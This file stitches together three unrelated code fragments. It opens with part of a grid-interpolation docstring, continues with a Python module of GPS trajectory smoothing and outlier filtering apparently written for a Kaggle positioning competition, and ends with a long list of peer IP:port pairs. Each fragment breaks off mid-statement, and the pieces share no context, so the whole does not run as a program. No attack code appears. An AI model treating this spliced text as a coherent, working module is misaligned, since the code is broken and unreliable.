np.ndarray: quantity you want to have interpolated on the grid
igrid: np.ndarray
The array that contains all of the points that are to be interpolated to
igrid.shape = [ninterpolation_points,3]
igrid[:,0] = z, igrid[:,1] = y, igrid[:,2] = x
fname: None, int
None: default option, will grab current dump
int: Dump number
method: str
'trilinear': Use a trilinear method to interpolate onto the points on igrid
'moments': Use a moments averaging within a cell and using a quadratic function
as the form for the interpolation
logvar: bool
For better fitting should I do var = np.log10(var)? The returned var_interpolated
will be scaled back to linear
Returns
-------
var_interp: np.ndarray
The var interpolated onto the 'igrid' points
'''
# first check if we have a np.ndarray or not
if isinstance(varloc, np.ndarray):
# for consistency of naming..
var = varloc
# check if it is the same shape | |
import copy
import warnings
from typing import List
import numpy as np
import pandas as pd
import scipy
import simdkalman
from numpy.fft import irfft, rfft, rfftfreq
from scipy.interpolate import interp1d
from scipy.ndimage import gaussian_filter1d
from tqdm import tqdm
from src.postprocess.metric import calc_haversine
warnings.filterwarnings("ignore")
def apply_kf_smoothing(df: pd.DataFrame) -> pd.DataFrame:
"""
from https://www.kaggle.com/emaerthin/demonstration-of-the-kalman-filter
"""
def _get_kalman_filter() -> simdkalman.KalmanFilter:
T = 1.0
state_transition = np.array(
[
[1, 0, T, 0, 0.5 * T ** 2, 0],
[0, 1, 0, T, 0, 0.5 * T ** 2],
[0, 0, 1, 0, T, 0],
[0, 0, 0, 1, 0, T],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1],
]
)
process_noise = (
np.diag([1e-5, 1e-5, 5e-6, 5e-6, 1e-6, 1e-6]) + np.ones((6, 6)) * 1e-9
)
observation_model = np.array([[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0]])
observation_noise = np.diag([5e-5, 5e-5]) + np.ones((2, 2)) * 1e-9
kf = simdkalman.KalmanFilter(
state_transition=state_transition,
process_noise=process_noise,
observation_model=observation_model,
observation_noise=observation_noise,
)
return kf
kf_ = _get_kalman_filter()
unique_paths = df[["collectionName", "phoneName"]].drop_duplicates().to_numpy()
for collection, phone in tqdm(unique_paths):
cond = np.logical_and(
df["collectionName"] == collection, df["phoneName"] == phone
)
data = df[cond][["latDeg", "lngDeg"]].to_numpy()
data = data.reshape(1, len(data), 2)
smoothed = kf_.smooth(data)
df.loc[cond, "latDeg"] = smoothed.states.mean[0, :, 0]
df.loc[cond, "lngDeg"] = smoothed.states.mean[0, :, 1]
return df
def filter_outlier(df: pd.DataFrame, one_direction: bool = False) -> pd.DataFrame:
"""
https://www.kaggle.com/dehokanta/baseline-post-processing-by-outlier-correction
"""
df["dist_pre"] = 0
df["dist_pro"] = 0
df["latDeg_pre"] = df["latDeg"].shift(periods=1, fill_value=0)
df["lngDeg_pre"] = df["lngDeg"].shift(periods=1, fill_value=0)
df["latDeg_pro"] = df["latDeg"].shift(periods=-1, fill_value=0)
df["lngDeg_pro"] = df["lngDeg"].shift(periods=-1, fill_value=0)
df["dist_pre"] = calc_haversine(df.latDeg_pre, df.lngDeg_pre, df.latDeg, df.lngDeg)
df["dist_pro"] = calc_haversine(df.latDeg, df.lngDeg, df.latDeg_pro, df.lngDeg_pro)
# start, end fix
list_phone = df["phone"].unique()
for phone in list_phone:
ind_s = df[df["phone"] == phone].index[0]
ind_e = df[df["phone"] == phone].index[-1]
df.loc[ind_s, "dist_pre"] = 0
df.loc[ind_e, "dist_pro"] = 0
# 95% tile
pro_95 = df["dist_pro"].mean() + (df["dist_pro"].std() * 2)
pre_95 = df["dist_pre"].mean() + (df["dist_pre"].std() * 2)
# find outlier data
if one_direction:
targets = ["latDeg", "lngDeg"]
dfs = []
for phone, df_ in df.groupby("phone"):
pre_mask = df_["dist_pre"].to_numpy() > pre_95
pre_mask[:-1] += pre_mask[1:]
deg_preds_filtered = copy.deepcopy(df_.loc[~pre_mask][targets].to_numpy())
T_ref_filtered = copy.deepcopy(
df_.loc[~pre_mask]["millisSinceGpsEpoch"].to_numpy()
)
deg_preds = scipy.interpolate.interp1d(
T_ref_filtered,
deg_preds_filtered,
axis=0,
bounds_error=None,
fill_value="extrapolate",
assume_sorted=True,
)(df_["millisSinceGpsEpoch"].to_numpy())
df_.loc[:, targets] = deg_preds
dfs.append(df_)
df = pd.concat(dfs, axis=0)
else:
ind = df[(df["dist_pro"] > pro_95) & (df["dist_pre"] > pre_95)][
["dist_pre", "dist_pro"]
].index
# smoothing
for i in ind:
df.loc[i, "latDeg"] = (
df.loc[i - 1, "latDeg"] + df.loc[i + 1, "latDeg"]
) / 2
df.loc[i, "lngDeg"] = (
df.loc[i - 1, "lngDeg"] + df.loc[i + 1, "lngDeg"]
) / 2
return df
def filter_outlier_with_absloute(
df: pd.DataFrame, max_velocity: float = 45.0, max_acc: float = 10.0
) -> pd.DataFrame:
df["dist_pre"] = 0
df["dist_pro"] = 0
df["latDeg_pre"] = df["latDeg"].shift(periods=1, fill_value=0)
df["lngDeg_pre"] = df["lngDeg"].shift(periods=1, fill_value=0)
df["latDeg_pro"] = df["latDeg"].shift(periods=-1, fill_value=0)
df["lngDeg_pro"] = df["lngDeg"].shift(periods=-1, fill_value=0)
df["dist_pre"] = calc_haversine(df.latDeg_pre, df.lngDeg_pre, df.latDeg, df.lngDeg)
df["dist_pro"] = calc_haversine(df.latDeg, df.lngDeg, df.latDeg_pro, df.lngDeg_pro)
# start, end fix
list_phone = df["phone"].unique()
for phone in list_phone:
ind_s = df[df["phone"] == phone].index[0]
ind_e = df[df["phone"] == phone].index[-1]
df.loc[ind_s, "dist_pre"] = 0
df.loc[ind_e, "dist_pro"] = 0
# 95% tile
# pro_95 = df["dist_pro"].mean() + (df["dist_pro"].std() * 2)
# pre_95 = df["dist_pre"].mean() + (df["dist_pre"].std() * 2)
# find outlier data
ind = df[(df["dist_pro"] > max_velocity) & (df["dist_pre"] > max_velocity)][
["dist_pre", "dist_pro"]
].index
# smoothing
for i in ind:
df.loc[i, "latDeg"] = (df.loc[i - 1, "latDeg"] + df.loc[i + 1, "latDeg"]) / 2
df.loc[i, "lngDeg"] = (df.loc[i - 1, "lngDeg"] + df.loc[i + 1, "lngDeg"]) / 2
return df
def make_lerp_data(df: pd.DataFrame):
"""
Generate interpolated lat,lng values for
different phone times in the same collection.
from https://www.kaggle.com/t88take/gsdc-phones-mean-prediction
"""
org_columns = df.columns
# Generate a combination of time x collection x phone and
# combine it with the original data (generate records to be interpolated)
assert (
len(
df[
df.duplicated(
["collectionName", "millisSinceGpsEpoch", "phoneName"], keep=False
)
]
)
== 0
)
assert (
len(df[df.duplicated(["collectionName", "millisSinceGpsEpoch"], keep=False)])
> 0
), "there are multiple phone at the same obsevation"
time_list = df[["collectionName", "millisSinceGpsEpoch"]].drop_duplicates()
phone_list = df[["collectionName", "phoneName"]].drop_duplicates()
# assert len(phone_list == 73), "all folders for phones equal 73"
# each timestep row = # of unique phone
tmp = time_list.merge(phone_list, on="collectionName", how="outer")
# diffrent phone, eg. Pixel 4 and 4XLModded, has diffrente timestep,
# so there are lots of nan after merge
# and that's the target to be interpolated with the other available data.
lerp_df = tmp.merge(
df, on=["collectionName", "millisSinceGpsEpoch", "phoneName"], how="left"
)
lerp_df["phone"] = lerp_df["collectionName"] + "_" + lerp_df["phoneName"]
lerp_df = lerp_df.sort_values(["phone", "millisSinceGpsEpoch"])
# linear interpolation
lerp_df["latDeg_prev"] = lerp_df["latDeg"].shift(1)
lerp_df["latDeg_next"] = lerp_df["latDeg"].shift(-1)
lerp_df["lngDeg_prev"] = lerp_df["lngDeg"].shift(1)
lerp_df["lngDeg_next"] = lerp_df["lngDeg"].shift(-1)
lerp_df["phone_prev"] = lerp_df["phone"].shift(1)
lerp_df["phone_next"] = lerp_df["phone"].shift(-1)
lerp_df["time_prev"] = lerp_df["millisSinceGpsEpoch"].shift(1)
lerp_df["time_next"] = lerp_df["millisSinceGpsEpoch"].shift(-1)
# Leave only records to be interpolated, nan & non_first, non_last data
lerp_df = lerp_df[
(lerp_df["latDeg"].isnull())
& (lerp_df["phone"] == lerp_df["phone_prev"])
& (lerp_df["phone"] == lerp_df["phone_next"])
].copy()
# calc lerp, velocity x delta(time)
lerp_df["latDeg"] = lerp_df["latDeg_prev"] + (
(lerp_df["latDeg_next"] - lerp_df["latDeg_prev"])
* (
(lerp_df["millisSinceGpsEpoch"] - lerp_df["time_prev"])
/ (lerp_df["time_next"] - lerp_df["time_prev"])
)
)
lerp_df["lngDeg"] = lerp_df["lngDeg_prev"] + (
(lerp_df["lngDeg_next"] - lerp_df["lngDeg_prev"])
* (
(lerp_df["millisSinceGpsEpoch"] - lerp_df["time_prev"])
/ (lerp_df["time_next"] - lerp_df["time_prev"])
)
)
# Leave only the data that has a complete set of previous and next data.
lerp_df = lerp_df[~lerp_df["latDeg"].isnull()]
return lerp_df[org_columns]
def calc_mean_pred(df: pd.DataFrame):
"""
Make a prediction based on the average of the predictions of phones
in the same collection.
from https://www.kaggle.com/t88take/gsdc-phones-mean-prediction
"""
lerp_df = make_lerp_data(df=df)
add_lerp = pd.concat([df, lerp_df])
# each time step == only one row, average over all phone latDeg,
# lanDeg at each time step
# eg. mean(original Deg Pixel4 and interpolated Deg 4XLModded with `make_lerp_data`)
mean_pred_result = (
add_lerp.groupby(["collectionName", "millisSinceGpsEpoch"])[
["latDeg", "lngDeg"]
]
.mean()
.reset_index()
)
base_cols = ["collectionName", "phoneName", "phone", "millisSinceGpsEpoch"]
try:
mean_pred_df = df[base_cols + ["latDeg_gt", "lngDeg_gt", "speedMps"]].copy()
except Exception:
mean_pred_df = df[base_cols].copy()
mean_pred_df = mean_pred_df.merge(
mean_pred_result[["collectionName", "millisSinceGpsEpoch", "latDeg", "lngDeg"]],
on=["collectionName", "millisSinceGpsEpoch"],
how="left",
)
return mean_pred_df
def get_removedevice(
input_df: pd.DataFrame, divece: str = "SamsungS20Ultra"
) -> pd.DataFrame:
"""
from
https://www.kaggle.com/columbia2131/device-eda-interpolate-by-removing-device-en-ja
"""
input_df["index"] = input_df.index
input_df = input_df.sort_values("millisSinceGpsEpoch")
input_df.index = input_df["millisSinceGpsEpoch"].values
output_df = pd.DataFrame()
for _, subdf in input_df.groupby("collectionName"):
phones = subdf["phoneName"].unique()
if (len(phones) == 1) or (divece not in phones):
output_df = pd.concat([output_df, subdf])
continue
origin_df = subdf.copy()
_index = subdf["phoneName"] == divece
subdf.loc[_index, "latDeg"] = np.nan
subdf.loc[_index, "lngDeg"] = np.nan
subdf = subdf.interpolate(method="index", limit_area="inside")
_index = subdf["latDeg"].isnull()
subdf.loc[_index, "latDeg"] = origin_df.loc[_index, "latDeg"].values
subdf.loc[_index, "lngDeg"] = origin_df.loc[_index, "lngDeg"].values
output_df = pd.concat([output_df, subdf])
output_df.index = output_df["index"].values
output_df = output_df.sort_index()
del output_df["index"]
return output_df
def fft_filter_signal(signal: np.ndarray, threshold: float = 1e8) -> np.ndarray:
orig_len = signal.shape[0]
fourier = rfft(signal)
frequencies = rfftfreq(signal.size, d=20e-3 / signal.size)
fourier[frequencies > threshold] = 0
filtered = irfft(fourier)
reduced = orig_len - filtered.shape[0]
if reduced > 0:
filtered = np.concatenate([filtered] + [filtered[-reduced:]])
return filtered
def apply_fft_filtering(
df: pd.DataFrame, threshold: float = 1e8, targets: List[str] = ["latDeg", "lngDeg"]
) -> pd.DataFrame:
unique_paths = df[["collectionName", "phoneName"]].drop_duplicates().to_numpy()
for collection, phone in tqdm(unique_paths):
cond = np.logical_and(
df["collectionName"] == collection, df["phoneName"] == phone
)
for target in targets:
df.loc[cond, target] = fft_filter_signal(
signal=df.loc[cond, target].fillna(0).values, threshold=threshold
)
return df
def apply_gauss_smoothing(df, params):
"""
from https://www.kaggle.com/bpetrb/adaptive-gauss-phone-mean
"""
SZ_1 = params["sz_1"]
SZ_2 = params["sz_2"]
SZ_CRIT = params["sz_crit"]
unique_paths = df[["collectionName", "phoneName"]].drop_duplicates().to_numpy()
for collection, phone in unique_paths:
cond = np.logical_and(
df["collectionName"] == collection, df["phoneName"] == phone
)
data = df[cond][["latDeg", "lngDeg"]].to_numpy()
lat_g1 = gaussian_filter1d(data[:, 0], np.sqrt(SZ_1))
lon_g1 = gaussian_filter1d(data[:, 1], np.sqrt(SZ_1))
lat_g2 = gaussian_filter1d(data[:, 0], np.sqrt(SZ_2))
lon_g2 = gaussian_filter1d(data[:, 1], np.sqrt(SZ_2))
lat_dif = data[1:, 0] - data[:-1, 0]
lon_dif = data[1:, 1] - data[:-1, 1]
lat_crit = np.append(
np.abs(
gaussian_filter1d(lat_dif, np.sqrt(SZ_CRIT))
/ (1e-9 + gaussian_filter1d(np.abs(lat_dif), np.sqrt(SZ_CRIT)))
),
[0],
)
lon_crit = np.append(
np.abs(
gaussian_filter1d(lon_dif, np.sqrt(SZ_CRIT))
/ (1e-9 + gaussian_filter1d(np.abs(lon_dif), np.sqrt(SZ_CRIT)))
),
[0],
)
df.loc[cond, "latDeg"] = lat_g1 * lat_crit + lat_g2 * (1.0 - lat_crit)
df.loc[cond, "lngDeg"] = lon_g1 * lon_crit + lon_g2 * (1.0 - lon_crit)
return df
def mean_with_other_phones(df):
"""
from https://www.kaggle.com/bpetrb/adaptive-gauss-phone-mean
"""
collections_list = df[["collectionName"]].drop_duplicates().to_numpy()
for collection in collections_list:
phone_list = (
df[df["collectionName"].to_list() == collection][["phoneName"]]
.drop_duplicates()
.to_numpy()
)
phone_data = {}
corrections = {}
for phone in phone_list:
cond = np.logical_and(
df["collectionName"] == collection[0], df["phoneName"] == phone[0]
).to_list()
phone_data[phone[0]] = df[cond][
["millisSinceGpsEpoch", "latDeg", "lngDeg"]
].to_numpy()
for current in phone_data:
correction = | |
data=[('172.16.17.32:40945', '172.16.31.10:6881'),
('172.16.17.32:40945', '192.168.3.11:6889'),
('172.16.17.32:40945', '172.16.17.32:6881'),
('172.16.17.32:40945', '172.16.58.3:50321'),
('172.16.17.32:40945', '172.16.17.32:51913'),
('172.16.17.32:40945', '172.16.58.3:42371'),
('172.16.17.32:40945', '192.168.127.12:40295'),
('172.16.17.32:40945', '192.168.127.12:6881'),
('192.168.3.11:21129', '172.16.58.3:1024'),
('192.168.3.11:21129', '192.168.127.12:6881'),
('192.168.3.11:21129', '192.168.127.12:39329'),
('192.168.3.11:21129', '172.16.58.3:7176'),
('192.168.3.11:21129', '172.16.31.10:51483'),
('192.168.3.11:21129', '172.16.17.32:51500'),
('192.168.3.11:21129', '172.16.17.32:2054'),
('192.168.3.11:21129', '172.16.58.3:60111'),
('172.16.58.3:44457', '192.168.3.11:8935'),
('172.16.58.3:44457', '172.16.17.32:50321'),
('172.16.58.3:44457', '172.16.31.10:51423'),
('172.16.58.3:44457', '172.16.58.3:49818'),
('172.16.58.3:44457', '172.16.17.32:50321'),
('172.16.58.3:44457', '172.16.58.3:6881'),
('172.16.58.3:44457', '172.16.58.3:31939'),
('172.16.58.3:44457', '172.16.17.32:1028'),
('172.16.17.32:6889', '172.16.58.3:49157'),
('172.16.17.32:6889', '172.16.17.32:6944'),
('172.16.17.32:6889', '192.168.3.11:6881'),
('172.16.17.32:6889', '192.168.127.12:52152'),
('172.16.17.32:6889', '172.16.17.32:3074'),
('172.16.17.32:6889', '192.168.127.12:55607'),
('172.16.17.32:6889', '192.168.3.11:8999'),
('172.16.17.32:6889', '172.16.17.32:51413'),
('192.168.127.12:12979', '192.168.127.12:30619'),
('192.168.127.12:12979', '172.16.58.3:51413'),
('192.168.127.12:12979', '172.16.31.10:61425'),
('192.168.127.12:12979', '172.16.58.3:26085'),
('192.168.127.12:12979', '172.16.17.32:13715'),
('192.168.127.12:12979', '192.168.3.11:61418'),
('192.168.127.12:12979', '192.168.3.11:8999'),
('192.168.127.12:12979', '192.168.127.12:49165'),
('192.168.3.11:58969', '172.16.58.3:25127'),
('192.168.3.11:58969', '172.16.31.10:6907'),
('192.168.3.11:58969', '172.16.31.10:6977'),
('192.168.3.11:58969', '172.16.17.32:51434'),
('192.168.3.11:58969', '172.16.58.3:52000'),
('192.168.3.11:58969', '192.168.127.12:6889'),
('192.168.3.11:58969', '172.16.58.3:46920'),
('192.168.3.11:58969', '172.16.58.3:6986'),
('172.16.31.10:41058', '172.16.17.32:35054'),
('172.16.31.10:41058', '172.16.31.10:6933'),
('172.16.31.10:41058', '172.16.17.32:35201'),
('172.16.31.10:41058', '172.16.17.32:6906'),
('172.16.31.10:41058', '172.16.31.10:38057'),
('172.16.31.10:41058', '192.168.127.12:8950'),
('172.16.31.10:41058', '172.16.17.32:8742'),
('172.16.31.10:41058', '172.16.58.3:48656'),
('172.16.58.3:40967', '192.168.127.12:8999'),
('172.16.58.3:40967', '172.16.31.10:51811'),
('172.16.58.3:40967', '172.16.31.10:6881'),
('172.16.58.3:40967', '172.16.31.10:65002'),
('172.16.58.3:40967', '192.168.3.11:6889'),
('172.16.58.3:40967', '172.16.58.3:49001'),
('172.16.58.3:40967', '172.16.58.3:51413'),
('172.16.58.3:40967', '172.16.17.32:43584'),
('172.16.31.10:6889', '172.16.31.10:6935'),
('172.16.31.10:6889', '172.16.17.32:51504'),
('172.16.31.10:6889', '172.16.17.32:51505'),
('172.16.31.10:6889', '172.16.31.10:51247'),
('172.16.31.10:6889', '192.168.127.12:31321'),
('172.16.31.10:6889', '192.168.127.12:31384'),
('172.16.31.10:6889', '172.16.58.3:51233'),
('172.16.31.10:6889', '172.16.58.3:59214'),
('172.16.17.32:6881', '172.16.17.32:6881'),
('172.16.17.32:6881', '192.168.127.12:20008'),
('172.16.17.32:6881', '172.16.31.10:63644'),
('172.16.17.32:6881', '172.16.58.3:8999'),
('172.16.17.32:6881', '192.168.3.11:8999'),
('172.16.17.32:6881', '192.168.3.11:6882'),
('172.16.17.32:6881', '172.16.17.32:6881'),
('172.16.17.32:6881', '172.16.58.3:31873'),
('172.16.17.32:9806', '192.168.127.12:28058'),
('172.16.17.32:9806', '192.168.3.11:50321'),
('172.16.17.32:9806', '172.16.58.3:7176'),
('172.16.17.32:9806', '192.168.127.12:31339'),
('172.16.17.32:9806', '192.168.127.12:51507'),
('172.16.17.32:9806', '172.16.58.3:46921'),
('172.16.17.32:9806', '172.16.58.3:57940'),
('172.16.17.32:9806', '172.16.31.10:30001'),
('1.64.65.66:25512', '192.168.127.12:51413'),
('1.64.65.66:25512', '192.168.3.11:45577'),
('1.64.65.66:25512', '172.16.17.32:3074'),
('1.64.65.66:25512', '192.168.3.11:26603'),
('192.168.3.116:25512', '192.168.3.11:27645'),
('1.64.65.66:25512', '172.16.31.10:11650'),
('192.168.3.116:25512', '192.168.127.12:26248'),
('1.64.65.66:25512', '192.168.3.11:51666'),
('172.16.31.10:50321', '172.16.58.3:49328'),
('172.16.31.10:50321', '192.168.127.12:57685'),
('172.16.31.10:50321', '192.168.3.11:54479'),
('172.16.31.10:50321', '46.181.213.99:10101'),
('172.16.31.10:50321', '172.16.31.10:57848'),
('172.16.31.10:50321', '172.16.31.10:50321'),
('172.16.31.10:50321', '172.16.31.10:8999'),
('172.16.31.10:50321', '172.16.58.3:53313'),
('172.16.17.32:46777', '192.168.3.11:41442'),
('172.16.17.32:46777', '172.16.58.3:39619'),
('172.16.17.32:46777', '172.16.17.32:18039'),
('172.16.17.32:46777', '172.16.17.32:6889'),
('172.16.17.32:46777', '172.16.17.32:3074'),
('172.16.17.32:46777', '192.168.3.11:11948'),
('172.16.17.32:46777', '172.16.17.32:6881'),
('172.16.17.32:46777', '172.16.58.3:31861'),
('172.16.17.32:51753', '172.16.31.10:58877'),
('172.16.17.32:51753', '172.16.17.32:6944'),
('172.16.17.32:51753', '172.16.17.32:51413'),
('172.16.17.32:51753', '172.16.17.32:54570'),
('172.16.17.32:51753', '172.16.17.32:52955'),
('172.16.17.32:51753', '172.16.31.10:8999'),
('172.16.17.32:51753', '172.16.31.10:26430'),
('172.16.17.32:51753', '172.16.17.32:56474'),
('192.168.127.12:26085', '192.168.3.11:34225'),
('192.168.127.12:26085', '192.168.127.12:48169'),
('192.168.127.12:26085', '172.16.58.3:25299'),
('192.168.127.12:26085', '192.168.127.12:51413'),
('192.168.127.12:26085', '192.168.3.11:6881'),
('192.168.127.12:26085', '172.16.58.3:50321'),
('192.168.127.12:26085', '192.168.127.12:28830'),
('192.168.127.12:26085', '192.168.3.11:51413'),
('192.168.127.12:63684', '172.16.17.32:6881'),
('192.168.127.12:63684', '192.168.127.12:51413'),
('192.168.127.12:63684', '192.168.127.12:48095'),
('192.168.127.12:63684', '172.16.58.3:6881'),
('192.168.127.12:63684', '172.16.58.3:45688'),
('192.168.127.12:63684', '172.16.58.3:25790'),
('192.168.127.12:63684', '172.16.31.10:31875'),
('192.168.127.12:63684', '172.16.31.10:50759'),
('192.168.127.12:39030', '172.16.17.32:40924'),
('192.168.127.12:39030', '192.168.3.11:1626'),
('192.168.127.12:39030', '172.16.31.10:10471'),
('192.168.127.12:39030', '192.168.3.11:5555'),
('192.168.127.12:39030', '172.16.17.32:52662'),
('192.168.127.12:39030', '172.16.31.10:37750'),
('192.168.127.12:39030', '192.168.3.11:64929'),
('192.168.127.12:39030', '172.16.31.10:17317'),
('192.168.3.11:6881', '192.168.3.11:6339'),
('192.168.3.11:6881', '192.168.3.11:6339'),
('192.168.3.11:6881', '172.16.58.3:45741'),
('192.168.3.11:6881', '172.16.58.3:27336'),
('192.168.3.11:6881', '192.168.3.11:6881'),
('192.168.3.11:6881', '172.16.17.32:6881'),
('192.168.3.11:6881', '172.16.58.3:51422'),
('192.168.3.11:6881', '172.16.17.32:60040'),
('172.16.58.3:22889', '192.168.3.11:29979'),
('172.16.58.3:22889', '192.168.127.12:10798'),
('172.16.58.3:22889', '192.168.3.11:50321'),
('172.16.58.3:22889', '172.16.17.32:51703'),
('172.16.58.3:22889', '172.16.58.3:6883'),
('172.16.58.3:22889', '172.16.58.3:6881'),
('172.16.58.3:22889', '172.16.31.10:46936'),
('172.16.58.3:22889', '172.16.17.32:47085'),
('172.16.58.3:22889', '172.16.31.10:11488'),
('172.16.58.3:22889', '192.168.3.11:50321'),
('172.16.58.3:22889', '172.16.31.10:3181'),
('172.16.58.3:22889', '172.16.58.3:8621'),
('172.16.58.3:22889', '192.168.3.11:42423'),
('172.16.58.3:22889', '192.168.127.12:11278'),
('172.16.58.3:22889', '172.16.17.32:6889'),
('172.16.58.3:22889', '172.16.31.10:12962'),
('172.16.17.32:49001', '192.168.3.11:63330'),
('172.16.17.32:49001', '172.16.17.32:31360'),
('172.16.17.32:49001', '172.16.58.3:35423'),
('172.16.17.32:49001', '192.168.127.12:59121'),
('172.16.17.32:49001', '172.16.31.10:57975'),
('172.16.17.32:49001', '192.168.127.12:19318'),
('172.16.17.32:49001', '192.168.3.11:55178'),
('172.16.17.32:49001', '172.16.31.10:12462'),
('172.16.17.32:16037', '192.168.127.12:49481'),
('172.16.17.32:16037', '172.16.31.10:6933'),
('172.16.17.32:16037', '172.16.31.10:51516'),
('172.16.17.32:16037', '172.16.58.3:49869'),
('172.16.17.32:16037', '172.16.17.32:6922'),
('172.16.17.32:16037', '172.16.58.3:25679'),
('172.16.17.32:16037', '172.16.58.3:46891'),
('172.16.17.32:16037', '192.168.3.11:51413'),
('192.168.127.12:18089', '192.168.3.11:58745'),
('192.168.127.12:18089', '172.16.17.32:63812'),
('192.168.127.12:18089', '172.16.17.32:6881'),
('192.168.127.12:18089', '172.16.31.10:61425'),
('192.168.127.12:18089', '192.168.3.11:49659'),
('192.168.127.12:18089', '192.168.127.12:37933'),
('192.168.127.12:18089', '172.16.58.3:6881'),
('192.168.127.12:18089', '172.16.58.3:50500'),
('192.168.3.11:6999', '172.16.17.32:6881'),
('192.168.3.11:6999', '172.16.31.10:6966'),
('192.168.3.11:6999', '172.16.17.32:55629'),
('192.168.3.11:6999', '172.16.31.10:51413'),
('192.168.3.11:6999', '172.16.31.10:27906'),
('192.168.3.11:6999', '172.16.31.10:27974'),
('192.168.3.11:6999', '172.16.58.3:57973'),
('192.168.3.11:6999', '172.16.31.10:8999'),
('192.168.3.11:6881', '192.168.3.11:51413'),
('192.168.3.11:6881', '172.16.31.10:55746'),
('192.168.3.11:6881', '172.16.17.32:11049'),
('192.168.3.11:6881', '192.168.3.11:6881'),
('192.168.3.11:6881', '172.16.17.32:51413'),
('192.168.3.11:6881', '172.16.31.10:51413'),
('192.168.3.11:6881', '172.16.17.32:38874'),
('192.168.3.11:6881', '172.16.17.32:46275'),
('192.168.127.12:49481', '172.16.17.32:51413'),
('192.168.127.12:49481', '192.168.127.12:51504'),
('192.168.127.12:49481', '172.16.31.10:51428'),
('192.168.127.12:49481', '172.16.17.32:51488'),
('192.168.127.12:49481', '172.16.31.10:6889'),
('192.168.127.12:49481', '172.16.58.3:50321'),
('192.168.127.12:49481', '172.16.58.3:6882'),
('192.168.127.12:49481', '192.168.127.12:49165'),
('192.168.127.12:6887', '192.168.3.11:6881'),
('192.168.127.12:6887', '172.16.58.3:6881'),
('192.168.127.12:6887', '172.16.17.32:23298'),
('192.168.127.12:6887', '192.168.3.11:6882'),
('192.168.127.12:6887', '192.168.3.11:6881'),
('192.168.127.12:6887', '192.168.3.11:51413'),
('192.168.127.12:6887', '172.16.17.32:57152'),
('192.168.127.12:6887', '172.16.17.32:12345'),
('172.16.58.3:6889', '172.16.31.10:6881'),
('172.16.58.3:6889', '172.16.31.10:51413'),
('172.16.58.3:6889', '172.16.17.32:51413'),
('172.16.58.3:6889', '172.16.31.10:6966'),
('172.16.58.3:6889', '192.168.3.11:6881'),
('172.16.58.3:6889', '172.16.17.32:6881'),
('172.16.58.3:6889', '192.168.3.11:51413'),
('172.16.58.3:6889', '192.168.3.11:34242'),
('172.16.58.3:6889', '172.16.58.3:46891'),
('172.16.58.3:6889', '172.16.31.10:51416'),
('172.16.58.3:6889', '192.168.3.11:6881'),
('172.16.58.3:6889', '192.168.127.12:6889'),
('172.16.58.3:6889', '192.168.127.12:51413'),
('172.16.58.3:6889', '172.16.31.10:51413'),
('172.16.58.3:6889', '192.168.3.11:63938'),
('172.16.58.3:6889', '192.168.3.11:8999'),
('172.16.31.10:8999', '172.16.31.10:8108'),
('172.16.31.10:8999', '172.16.31.10:23704'),
('172.16.31.10:8999', '172.16.17.32:23161'),
('172.16.31.10:8999', '192.168.3.11:25030'),
('172.16.31.10:8999', '192.168.127.12:59620'),
('172.16.31.10:8999', '192.168.3.11:9394'),
('172.16.31.10:8999', '172.16.58.3:31398'),
('172.16.31.10:8999', '172.16.17.32:36473'),
('172.16.31.10:6881', '172.16.17.32:8957'),
('172.16.31.10:6881', '172.16.17.32:14987'),
('172.16.31.10:6881', '172.16.31.10:17367'),
('172.16.31.10:6881', '172.16.58.3:24368'),
('172.16.31.10:6881', '172.16.17.32:27859'),
('172.16.31.10:6881', '172.16.31.10:1045'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.127.126:64879'),
('172.16.31.10:6881', '192.168.127.12:61221'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.31.10:6882'),
('172.16.31.10:6881', '172.16.31.10:52548'),
('172.16.31.10:6881', '192.168.3.11:10021'),
('172.16.31.10:6881', '172.16.31.10:10763'),
('172.16.31.10:6881', '192.168.3.11:29701'),
('172.16.31.10:6881', '172.16.58.3:43280'),
('172.16.31.10:6881', '172.16.58.3:58550'),
('172.16.31.10:6881', '192.168.3.11:27971'),
('172.16.31.10:6881', '172.16.31.10:18089'),
('172.16.31.10:6881', '172.16.31.10:57148'),
('172.16.31.10:6881', '192.168.3.11:14036'),
('172.16.31.10:6881', '172.16.17.32:1000'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.3.11:22586'),
('172.16.31.10:6881', '172.16.31.10:25673'),
('172.16.31.10:6881', '172.16.58.3:35477'),
('172.16.31.10:6881', '172.16.58.3:62348'),
('172.16.31.10:6881', '172.16.31.10:15493'),
('172.16.31.10:6881', '192.168.127.12:62633'),
('172.16.31.10:6881', '172.16.31.10:50321'),
('172.16.31.10:6881', '172.16.58.3:21331'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.58.3:9921'),
('172.16.31.10:6881', '192.168.127.12:43807'),
('172.16.31.10:6881', '172.16.17.32:12551'),
('172.16.31.10:6881', '192.168.127.12:1055'),
('172.16.31.10:6881', '172.16.17.32:13279'),
('172.16.31.10:6881', '192.168.127.12:20919'),
('172.16.31.10:6881', '192.168.127.12:47004'),
('172.16.31.10:6881', '192.168.127.12:47007'),
('172.16.31.10:6881', '172.16.58.3:47005'),
('172.16.31.10:6881', '172.16.31.10:18768'),
('172.16.31.10:6881', '172.16.58.3:8727'),
('172.16.31.10:6881', '172.16.31.10:27432'),
('172.16.31.10:6881', '172.16.58.3:47266'),
('172.16.31.10:6881', '192.168.3.11:45833'),
('172.16.31.10:6881', '172.16.58.3:4086'),
('172.16.31.10:6881', '192.168.127.12:27032'),
('172.16.31.10:6881', '192.168.127.12:12099'),
('172.16.31.10:6881', '172.16.17.32:26782'),
('172.16.31.10:6881', '192.168.3.11:60029'),
('172.16.31.10:6881', '192.168.127.12:9566'),
('172.16.31.10:6881', '172.16.58.3:50680'),
('172.16.31.10:6881', '192.168.3.11:6339'),
('172.16.31.10:6881', '192.168.3.11:25622'),
('172.16.31.10:6881', '172.16.17.32:27463'),
('172.16.31.10:6881', '172.16.58.3:21009'),
('172.16.31.10:6881', '172.16.17.32:27470'),
('172.16.31.10:6881', '172.16.31.10:15721'),
('172.16.31.10:6881', '172.16.31.10:17562'),
('172.16.31.10:6881', '172.16.58.3:60123'),
('172.16.31.10:6881', '172.16.58.3:25438'),
('172.16.31.10:6881', '172.16.31.10:11112'),
